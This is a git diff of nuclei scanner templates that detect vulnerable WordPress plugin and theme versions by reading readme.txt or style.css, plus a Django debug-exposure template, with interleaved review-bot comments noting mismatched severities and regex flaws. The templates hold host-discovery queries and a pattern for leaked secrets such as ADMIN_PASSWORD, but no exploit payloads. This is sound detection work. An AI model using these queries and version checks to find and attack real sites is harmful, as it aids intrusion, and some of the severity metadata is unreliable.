+ - type: status + status: + - 200 + + - type: word + words: + - "login-as-users" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.2') \ No newline at end of file diff --git a/poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml b/poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml index 3a8d38d44e..05a39f47be 100644 --- a/poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml +++ b/poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml 
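Review bot: `description: >` is empty and `cvss-metrics:`, `cvss-score:` and `cve-id:` carry no value, yet `tags` includes `cve` and `severity` is `critical`; an empty `cvss-score` parses as null, and the `cve` tag will pull this template into CVE-filtered runs with no CVE behind it. Either fill these from the referenced Wordfence advisory or drop the `cve` tag and the empty keys, and `shodan-query: 'vuln:'` should go rather than stay as a bare prefix. The name promises an authentication bypass but the template only fingerprints the readme.txt `Stable tag`, so a hit means a possibly affected version, not a demonstrated bypass; one sentence in `description` saying `version fingerprint only; exploitability not verified by this template` would keep triage honest at `critical`.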
@@ -1,25 +1,25 @@ id: django-debug-exposure - info: name: Django Debug Exposure - author: shelled - severity: medium + author: geeknik + severity: high + reference: + - https://twitter.com/Alra3ees/status/1397660633928286208 tags: django,exposure - requests: - method: POST path: - "{{BaseURL}}/admin/login/?next=/admin/" - matchers-condition: and matchers: - type: status status: - - 403 - + - 500 - type: word part: body words: - - 'seeing the help section of this page because you have DEBUG =' - - 'True' + - "DB_HOST" + - "DB_NAME" + - "DJANGO" + - "ADMIN_PASSWORD" condition: and diff --git a/poc/cve/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml b/poc/cve/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml new file mode 100644 index 0000000000..2d88fc2615 --- /dev/null +++ b/poc/cve/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml 
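Review bot: The rewritten word matcher requires all four of `DB_HOST`, `DB_NAME`, `DJANGO` and `ADMIN_PASSWORD` in the body (`condition: and`), but these are deployment-specific environment-variable names rather than anything Django itself prints, so the template now detects one particular configuration instead of Django debug exposure in general. The status change compounds this: with DEBUG enabled, a POST to the admin login without a CSRF token normally yields Django's 403 CSRF-failure page (what the removed lines matched), while a 500 appears only if the request raises an exception, so presumably most DEBUG-enabled sites will no longer match at all. A marker from Django's own technical error page would be the reliable signal, with the settings names at most as an `or` refinement, and `severity: high` deserves a second look given that Django masks the values of settings whose names look like secrets. Stylistically, this file keeps the legacy `requests:` key while every other template in this commit uses `http:`, and despite living under `cross_site_request_forgery` neither the name nor the tags mention CSRF.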
@@ -0,0 +1,59 @@ +id: CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc + +info: + name: > + Custom Permalinks <= 2.6.0 - Authenticated(Editor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Custom Permalinks plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.6.0 due to insufficient input sanitization and output escaping on tag names. This allows authenticated users, with editor-level permissions or greater to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, even when 'unfiltered_html' has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/97f8549a-292d-4a6d-8ec0-550467e5cf0f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2023-0926 + metadata: + fofa-query: "wp-content/plugins/custom-permalinks/" + google-query: inurl:"/wp-content/plugins/custom-permalinks/" + shodan-query: 'vuln:CVE-2023-0926' + tags: cve,wordpress,wp-plugin,custom-permalinks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/custom-permalinks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "custom-permalinks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.0') \ No newline at end of file diff --git a/poc/cve/CVE-2023-6987-c1c87c85e30a10fc9ff9a903c209fbf6.yaml b/poc/cve/CVE-2023-6987-c1c87c85e30a10fc9ff9a903c209fbf6.yaml new file mode 100644 index 0000000000..c2de88fdfe --- /dev/null 
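Review bot: `severity: low` and the trailing `low` tag disagree with the template's own `cvss-score: 4.4`, which falls in the CVSS v3.1 Medium band (4.0–6.9); nuclei's severity filtering goes by the `severity` field, so runs asking for medium and above will skip this template. The same mismatch appears in the CVE-2024-2254 (6.4, `low`), CVE-2024-39666 (4.4, `low`), CVE-2024-4096 (6.4, `low`), CVE-2024-43239 (5.3, `low`) and CVE-2024-43242 (8.1, `critical`) hunks below. If the value is deliberately taken from the advisory's own rating rather than the vector, say so in a comment beside `severity`; otherwise derive it from `cvss-score`. The index hunks earlier in this diff also add a `poc/sql/` file with this exact name; if that copy carries the same `id`, nuclei will report a duplicate template ID and load only one of them.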
+++ b/poc/cve/CVE-2023-6987-c1c87c85e30a10fc9ff9a903c209fbf6.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-6987-c1c87c85e30a10fc9ff9a903c209fbf6 + +info: + name: > + String Locator <= 2.6.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The String locator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'sql-column' parameter in all versions up to, and including, 2.6.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This required WP_DEBUG to be enabled in order to be exploited. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/18e0140e-ac24-48c6-aea0-bb0da203a817?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-6987 + metadata: + fofa-query: "wp-content/plugins/string-locator/" + google-query: inurl:"/wp-content/plugins/string-locator/" + shodan-query: 'vuln:CVE-2023-6987' + tags: cve,wordpress,wp-plugin,string-locator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/string-locator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "string-locator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.5') \ No newline at end of file 
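Review bot: The description states the issue `required WP_DEBUG to be enabled in order to be exploited`, but the template only fingerprints the readme.txt `Stable tag`, so a `medium` result asserts a vulnerable version and says nothing about that precondition; a `metadata` entry such as `verified: false` or a closing sentence in `description` noting that WP_DEBUG is not checked would keep triage honest. More generally, `Stable tag` is the wp.org release marker and can lag or lead the code actually deployed, so every readme-based template in this commit reports a probable version rather than confirmed exposure — worth one comment above the first extractor in whichever template serves as the pattern. The `word` matcher on `string-locator` also assumes the slug literally appears in readme.txt, which is not guaranteed; since the request path already pins the plugin, a miss there is a silent false negative rather than a safety check.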
diff --git a/poc/cve/CVE-2024-2254-fff7de08f6116735e0400b319113ddc3.yaml b/poc/cve/CVE-2024-2254-fff7de08f6116735e0400b319113ddc3.yaml new file mode 100644 index 0000000000..e917e51ea4 --- /dev/null +++ b/poc/cve/CVE-2024-2254-fff7de08f6116735e0400b319113ddc3.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-2254-fff7de08f6116735e0400b319113ddc3 + +info: + name: > + RT Easy Builder – Advanced addons for Elementor <= 2.2 - Authenticated (Contributor+) Stored Cross-site Scripting + author: topscoder + severity: low + description: > + The RT Easy Builder – Advanced addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a5fb289e-bd38-42ea-86a4-7816b59bd0b2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-2254 + metadata: + fofa-query: "wp-content/plugins/rt-easy-builder-advanced-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/rt-easy-builder-advanced-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-2254' + tags: cve,wordpress,wp-plugin,rt-easy-builder-advanced-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/rt-easy-builder-advanced-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rt-easy-builder-advanced-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-39666.yaml b/poc/cve/CVE-2024-39666.yaml new file mode 100644 index 0000000000..f541fecb0f --- /dev/null +++ b/poc/cve/CVE-2024-39666.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39666 + +info: + name: > + WooCommerce <= 9.1.2 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 9.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only impacts multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7ad4272c-75a1-4bc9-be3b-add80de45871?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-39666 + metadata: + fofa-query: "wp-content/plugins/woocommerce/" + google-query: inurl:"/wp-content/plugins/woocommerce/" + shodan-query: 'vuln:CVE-2024-39666' + tags: cve,wordpress,wp-plugin,woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 9.1.2') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-4096-f7fc8238f9059dfbea1c3f48f5cc8e2e.yaml b/poc/cve/CVE-2024-4096-f7fc8238f9059dfbea1c3f48f5cc8e2e.yaml new file mode 100644 index 0000000000..46b10d7552 --- /dev/null +++ b/poc/cve/CVE-2024-4096-f7fc8238f9059dfbea1c3f48f5cc8e2e.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-4096-f7fc8238f9059dfbea1c3f48f5cc8e2e + +info: + name: > + Responsive Tabs <= 4.0.10 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Responsive Tabs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'Tab' titles in all versions up to, and including, 4.0.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7c66fdab-d067-4043-a602-9bbe94962a00?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-4096 + metadata: + fofa-query: "wp-content/plugins/responsive-tabs/" + google-query: inurl:"/wp-content/plugins/responsive-tabs/" + shodan-query: 'vuln:CVE-2024-4096' + tags: cve,wordpress,wp-plugin,responsive-tabs,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/responsive-tabs/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "responsive-tabs" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0.10') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43238.yaml b/poc/cve/CVE-2024-43238.yaml new file mode 100644 index 0000000000..fb9eb97cd6 --- /dev/null +++ b/poc/cve/CVE-2024-43238.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43238 + +info: + name: > + weMail <= 1.14.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The weMail plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.14.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/82e9bd78-726f-421f-8bf0-560fa9eeab2c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43238 + metadata: + fofa-query: "wp-content/plugins/wemail/" + google-query: inurl:"/wp-content/plugins/wemail/" + shodan-query: 'vuln:CVE-2024-43238' + tags: cve,wordpress,wp-plugin,wemail,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wemail/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wemail" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.14.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43239.yaml b/poc/cve/CVE-2024-43239.yaml new file mode 100644 index 0000000000..3b2edd7d69 --- /dev/null +++ b/poc/cve/CVE-2024-43239.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43239 + +info: + name: > + Masteriyo - LMS <= 1.11.4 - Authenticated (Student+) Insecure Direct Object Reference + author: topscoder + severity: low + description: > + The Masteriyo LMS – eLearning and Online Course Builder for WordPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.11.4 due to missing validation on the 'course_id' user controlled key. This makes it possible for authenticated attackers, with student-level access and above, to review courses they don't have access to. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c3d7a587-042d-4ba1-9373-aaeb24c711f5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43239 + metadata: + fofa-query: "wp-content/plugins/learning-management-system/" + google-query: inurl:"/wp-content/plugins/learning-management-system/" + shodan-query: 'vuln:CVE-2024-43239' + tags: cve,wordpress,wp-plugin,learning-management-system,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learning-management-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learning-management-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.11.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43240.yaml b/poc/cve/CVE-2024-43240.yaml new file mode 100644 index 0000000000..d3bbc9f1ae --- /dev/null +++ b/poc/cve/CVE-2024-43240.yaml 
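Review bot: The name and description describe a flaw that needs student-level authentication (`Authenticated (Student+)`), but `cvss-metrics` says `PR:N` with `S:U/C:N/I:L/A:N`, the vector of an unauthenticated integrity-only issue, and the 5.3 score sits in the CVSS Medium band while `severity` and the last tag say `low`. At least one of the three is wrong; the upstream advisory should settle which, and the chosen value should be carried consistently into `severity`, the `tags` suffix and the vector. The plugin directory `learning-management-system` also differs from the product name `Masteriyo` used in the title, so a `description` line naming the slug would help anyone cross-checking a hit against the site's plugin list.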
@@ -0,0 +1,59 @@ +id: CVE-2024-43240 + +info: + name: > + Indeed Membership Pro <= 12.6 - Unauthenticated Privilege Escalation + author: topscoder + severity: critical + description: > + The Indeed Membership Pro plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 12.6. This is due to the plugin not properly restricting access to functionality that allows privilege assignment. This makes it possible for unauthenticated attackers to gain access to accounts that have higher privileges, such as administrator. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3bb4a8ba-33f1-4183-be76-72f6a99fc1fa?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-43240 + metadata: + fofa-query: "wp-content/plugins/indeed-membership-pro/" + google-query: inurl:"/wp-content/plugins/indeed-membership-pro/" + shodan-query: 'vuln:CVE-2024-43240' + tags: cve,wordpress,wp-plugin,indeed-membership-pro,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/indeed-membership-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "indeed-membership-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 12.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43241.yaml b/poc/cve/CVE-2024-43241.yaml new file mode 100644 index 0000000000..10bd8e03a5 --- /dev/null +++ b/poc/cve/CVE-2024-43241.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43241 + +info: + name: > + Indeed Membership Pro <= 12.6 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Indeed Membership Pro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 12.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b7dce0db-792f-4be2-a55d-b4fb7442b548?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43241 + metadata: + fofa-query: "wp-content/plugins/indeed-membership-pro/" + google-query: inurl:"/wp-content/plugins/indeed-membership-pro/" + shodan-query: 'vuln:CVE-2024-43241' + tags: cve,wordpress,wp-plugin,indeed-membership-pro,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/indeed-membership-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "indeed-membership-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 12.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43242.yaml b/poc/cve/CVE-2024-43242.yaml new file mode 100644 index 0000000000..2ebc2357f7 --- /dev/null +++ b/poc/cve/CVE-2024-43242.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43242 + +info: + name: > + Indeed Membership Pro <= 12.6 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + The Indeed Membership Pro plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 12.6 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/12f314c5-ba73-4204-b276-904d9de7c099?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-43242 + metadata: + fofa-query: "wp-content/plugins/indeed-membership-pro/" + google-query: inurl:"/wp-content/plugins/indeed-membership-pro/" + shodan-query: 'vuln:CVE-2024-43242' + tags: cve,wordpress,wp-plugin,indeed-membership-pro,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/indeed-membership-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "indeed-membership-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 12.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43244.yaml b/poc/cve/CVE-2024-43244.yaml new file mode 100644 index 0000000000..f64390a330 --- /dev/null +++ b/poc/cve/CVE-2024-43244.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43244 + +info: + name: > + Houzez <= 3.2.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Houzez theme for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 3.2.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2ceaa52e-564d-4454-8e3b-dc6899c910dd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43244 + metadata: + fofa-query: "wp-content/themes/houzez/" + google-query: inurl:"/wp-content/themes/houzez/" + shodan-query: 'vuln:CVE-2024-43244' + tags: cve,wordpress,wp-theme,houzez,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/houzez/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "houzez" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43245.yaml b/poc/cve/CVE-2024-43245.yaml new file mode 100644 index 0000000000..b717f875f6 --- /dev/null +++ b/poc/cve/CVE-2024-43245.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43245 + +info: + name: > + JobSearch <= 2.3.4 - Authentication Bypass to Account Takeover + author: topscoder + severity: critical + description: > + The JobSearch WP Job Board plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 2.3.4. This is due to the plugin not properly validating identity on login functionality. This makes it possible for unauthenticated attackers to gain access to accounts they should not have access to. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7250da0a-1ac6-48a6-a480-0721d604add3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-43245 + metadata: + fofa-query: "wp-content/plugins/wp-jobsearch/" + google-query: inurl:"/wp-content/plugins/wp-jobsearch/" + shodan-query: 'vuln:CVE-2024-43245' + tags: cve,wordpress,wp-plugin,wp-jobsearch,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-jobsearch/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-jobsearch" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43246.yaml b/poc/cve/CVE-2024-43246.yaml new file mode 100644 index 0000000000..1f23add1fc --- /dev/null +++ b/poc/cve/CVE-2024-43246.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43246 + +info: + name: > + WHMpress <= 6.2-revision-5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WHMpress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 6.2-revision-5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5dea4293-0496-4cee-9d8a-c15beaa51b14?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43246 + metadata: + fofa-query: "wp-content/plugins/whmpress/" + google-query: inurl:"/wp-content/plugins/whmpress/" + shodan-query: 'vuln:CVE-2024-43246' + tags: cve,wordpress,wp-plugin,whmpress,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/whmpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "whmpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.2-revision-5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43247.yaml b/poc/cve/CVE-2024-43247.yaml new file mode 100644 index 0000000000..2d5b1f65cc --- /dev/null +++ b/poc/cve/CVE-2024-43247.yaml 
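Review bot: The extractor regex `([0-9.]+)` can capture at most `6.2` from a Stable tag such as `6.2-revision-5`, yet the DSL constraint is written as `'<= 6.2-revision-5'`, a value the extractor can never produce. If `compare_versions` treats the hyphenated suffix as a pre-release component it sorts below `6.2`, and a site running exactly the last vulnerable build would then be reported as not vulnerable; I have not verified the library's handling, so this should be checked rather than assumed. Either widen the capture to the real tag format or compare against the numeric prefix the regex yields, `- compare_versions(version, '<= 6.2')`. The hunk for CVE-2024-43247 carries the identical regex/constraint pair for the same plugin.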
@@ -0,0 +1,59 @@ +id: CVE-2024-43247 + +info: + name: > + WHMpress <= 6.2-revision-5 - Missing Authorization to Authenticated (Subscriber+) Settings Update + author: topscoder + severity: low + description: > + The WHMpress - WHMCS WordPress Integration Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 6.2-revision-5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7d264e88-7137-48ff-8ce3-5fff77e2474a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43247 + metadata: + fofa-query: "wp-content/plugins/whmpress/" + google-query: inurl:"/wp-content/plugins/whmpress/" + shodan-query: 'vuln:CVE-2024-43247' + tags: cve,wordpress,wp-plugin,whmpress,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/whmpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "whmpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 